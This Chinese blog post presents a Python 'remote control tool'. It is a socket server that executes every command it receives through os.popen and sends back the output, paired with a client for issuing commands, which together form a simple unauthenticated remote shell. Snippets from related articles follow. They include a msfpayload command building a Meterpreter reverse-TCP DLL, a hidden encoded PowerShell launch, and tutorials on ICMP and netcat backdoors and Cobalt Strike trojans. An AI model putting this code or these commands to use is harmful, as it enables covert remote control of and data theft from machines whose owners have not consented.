python之远控工具

原理:利用套字节发送命令,在服务端执行,并将执行的结果返回客户端。

在python3中发送文本使用:send()把字符串encode进行编码,接受recv()把字符串使用decode进行解码。

# coding:utf-8
import socket
import os

# 创建套字节
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# 绑定套字节(①获取主机名,②设置端口)
host = socket.gethostname()
port = 7777
s.bind((host, port))

# 监听
s.listen(socket.SOMAXCONN)
print("等待连接......")
# 处理连接(获取请求主机的参数)
c, addr = s.accept()
print("连接成功")
c.send(‘连接成功‘.encode(‘utf-8‘))
while True:
    cmd=c.recv(1024).decode(‘utf-8‘)
    result=os.popen(cmd).read()
    c.send(str(result).encode(‘utf-8‘))
s.close()

远控服务端

# coding:utf-8
import socket

c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = socket.gethostname()
port = 7777
c.connect((host, port));
msg = c.recv(1024).decode(‘utf-8‘)
print(msg)
while True:
    cmd = input("请输入命令:")
    c.send(cmd.encode(‘utf-8‘))
    result=c.recv(1024).decode(‘utf-8‘)
    print(result)
c.close()

远控客户端

原文地址:https://www.cnblogs.com/PrideAssassin/p/11708203.html

时间: 2024-11-06 21:18:42

python之远控工具的相关文章

python+msf make windows远控

分析的一个远控,感谢wstone的指导~ 创建dll ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 -t dll X > /tmp/sc.dll python main.py import sys, os import shutil import time import ctypes import glob import multiprocessing import multiprocess

纪念我在乙方安全公司工作的2年_关于远控

乙方安全公司工作主要还是往外卖一些安全产品.比如做数据取证的,入侵检测的,或者往外卖硬件的IDS IPS没有实力的就买别家的产品自己贴牌,深深感受到乙方公司关系取得订单和销售的重要.我之前的公司还是做取数据的比较多.既然要拿数据一套好用的远控是必不可少的.在乙方公司的这段时间特别感谢小鱼 hack970.学到了好多东西,不管是技术上还是精神上.得到了很多鼓励. 如果要取境外的数据的话.远控从结构上要考虑这三点. 1  多协议穿墙.这方面就是Plug X 做的是比较好的,好像再没有看到比较出彩的.

[jk]服务器远控卡及kvm切换器

远控卡的需求 经常我们有这么一个需求,那就是某一台器服务器突然宕机,不能启动,而机房却在外地.解决这个问题的方法有两种,一是联系机房人员,二是通过idrac卡远程连接.我们必须根据事情的轻重缓急,来选择解决办法,毕竟恢复服务正常运行是第一原则.如果这台服务器不是非得马上起来的话(已经做了高可用),我们又想查看具体的宕机原因,那我们就可以通过idrac卡远程连接过去.连接方法如下: 远控卡功能介绍 ,可以传文件,装系统,做电源管理,硬件监控(ipmi)等. 准备工作 1.能够远程访问的BMC地址(

Python3实现ICMP远控后门(上)

这几天一直在研究远控木马的一些通信协议,比如TCP,UDP,ICMP,DNS,HTTP等等,对于TCP,UDP这两种就不讲解了,因为太常见了. 大家可能对采用ICMP,DNS的木马不是很熟悉,其实这两种协议在木马通信上很流行,特点是比较隐蔽,不容易被封锁.HTTP协议主要是用在以大型网站作为C&C服务器的场景,例如之前就有使用twitter作为 C&C服务器. 本次就以ICMP协议进行分析,并使用Python开发出一个ICMP远控后门,在写这篇文章的之前,我感觉大家对ICMP协议肯定不会很

Python3实现ICMP远控后门(下)之“Boss”出场

ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 第三篇:Python3实现ICMP远控后门(中)之"嗅探"黑科技 熬到最后一篇了,本系列的Boss要出场了,实现了一个有意思的ICMP后门,暂时使用pyinstaller打包成了一个win32和64版本,如下图所示. 在前几篇的基础上,本篇扩展的知识点为数据的加密和解密,以及shell的调用,并最终生成一个可用的ICMP后门.本篇总共分为五节,需要花费5分钟时

利用kage把msf变成可视化远控平台

项目下载https://github.com/WayzDev/Kage/releases 这里用kali系统演示 1,先下载kage: 2,右击给予执行权限 3,启动msf msfconsole -q -x 'load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msfuser Pass=msfpass' 注意:如果kage跟msf不在一个机器上,上面命令如果不带serverhost参数,则只容许127.0.0.1链接我们也那么可以通过 msf

Cobalt Strike入门教程-通过exe木马实现远控

Cobalt Strike(简称CS)有很多功能,这篇文章主要介绍最基本的功能:通过exe木马实现远程控制. CS分为两部分:客户端和Team Server服务端.这两部分都依赖Java 1.8,所以运行CS程序前要安装JRE. 分享一个Cobalt Strike v3.8的试用版,可长期试用.百度网盘:https://pan.baidu.com/s/1nXq58froWt0mu3q8I4HsSQ,提取码:fdvb. 第1步:启动CS服务端 将下载的CS程序放到Kali中,执行./teamser

一起应急远控事件分析

攻击者执行的Powershell命令如下: pwd=asasd3344&cmd=cmd /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8Ad

[实战]用nc+简单batvbs脚本+winrar制作迷你远控后门

前言 某大佬某天和我聊起了nc,并且提到了nc正反向shell这个概念. 我对nc之前的了解程度仅局限于:可以侦听TCP/UDP端口,发起对应的连接. 真正的远控还没实践过,所以决定写个小后门试一试. NC.正向Shell.反向Shell介绍 什么是nc: nc是netcat的简写,就是一个简单.可靠的网络工具.当然因为某些奇怪原因,已经被各大杀毒轮番轰炸.原因就和下文所述有关. nc的作用: (1)实现任意TCP/UDP端口的侦听,nc可以作为服务器端以TCP或UDP方式侦听指定端口 (2)端